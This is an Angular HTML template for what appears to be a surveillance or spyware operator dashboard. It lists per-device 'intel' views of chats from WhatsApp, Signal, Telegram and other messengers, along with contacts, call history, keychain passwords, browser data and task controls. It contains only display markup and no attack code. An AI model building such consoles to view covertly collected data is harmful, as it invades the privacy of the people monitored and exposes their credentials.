<div class="info-wrapper">

  <div class="left-panel">
    <div class="cube info-cube" [class.selected]="selectedInfo === 'apps'" (click)="selectInfo('apps')">
      <span class="icon">
        <app-svg-icon name="info-apps"></app-svg-icon>
      </span>
      <span class="text">Apps</span>
    </div>
    <div class="cube info-cube" [class.selected]="selectedInfo === 'tasks'" (click)="selectInfo('tasks')">
      <span class="icon">
        <app-svg-icon name="info-tasks"></app-svg-icon>
      </span>
      <span class="text">Tasks view</span>
    </div>
  </div>
  <div class="center-panel" *ngIf="selectedInfo === 'apps'">
    <div *ngFor="let task of tasks" class="cube intel-cube" [class.selected]="selectedIntel === task.name"
      (click)="selectIntel(task.name)">
      <span class="icon">
        <app-svg-icon [name]="task.name" [size]="17"></app-svg-icon>
      </span>
      <span class="text">{{task.display_name}}</span>
      <span class="state-icon" (click)="taskAction($event, task.name)">
        <app-svg-icon [size]="15" name="device-{{task.state}}"></app-svg-icon>
      </span>

    </div>
  </div>
  <div class="intels-panel" *ngIf="selectedInfo === 'apps'">
    <div class="intels-wrapper" *ngIf="data; else loader">
      <div *ngIf="!isEmpty(data); else noData">
        <intel-device-info [data]="data" class="intel" *ngIf="selectedIntel === 'deviceinfo'"></intel-device-info>
        <intel-chats class="intel" [data]="data" [messages]="messages" [sessions]="sessions" [calls]="calls"
          *ngIf="['whatsapp','telegram','wechat','line','sms', 'signal'].includes(selectedIntel)"
          (selectSession)="onSelectSession($event)">
        </intel-chats>
        <intel-contacts class="intel" [data]='data' *ngIf="selectedIntel === 'contacts' && data.contacts">
        </intel-contacts>
        <intel-call-history class="intel" [data]='data' *ngIf="selectedIntel === 'callhistory' && data.call_histories">
        </intel-call-history>
        <intel-passwords class="intel" [data]='data' *ngIf="selectedIntel === 'keychain' && data.keychains">
        </intel-passwords>
        <intel-app-list class="intel" [data]='data' *ngIf="selectedIntel === 'apps' && data.apps"></intel-app-list>
        <intel-browser class="intel" [data]='data' *ngIf="selectedIntel === 'browser' && data.browser"></intel-browser>
      </div>
    </div>
  </div>


  <ng-template #loader>
    <app-loading [type]="'loader'"></app-loading>
  </ng-template>

  <ng-template #noData>
    <div class="noData">
      <app-svg-icon name="no_data" [size]="150"></app-svg-icon>
      <span>No Data</span>
    </div>
  </ng-template>


  <div class="tasks-view" *ngIf="selectedInfo === 'tasks'">
    <intel-tasks [data]="tasksView"></intel-tasks>
  </div>

</div>
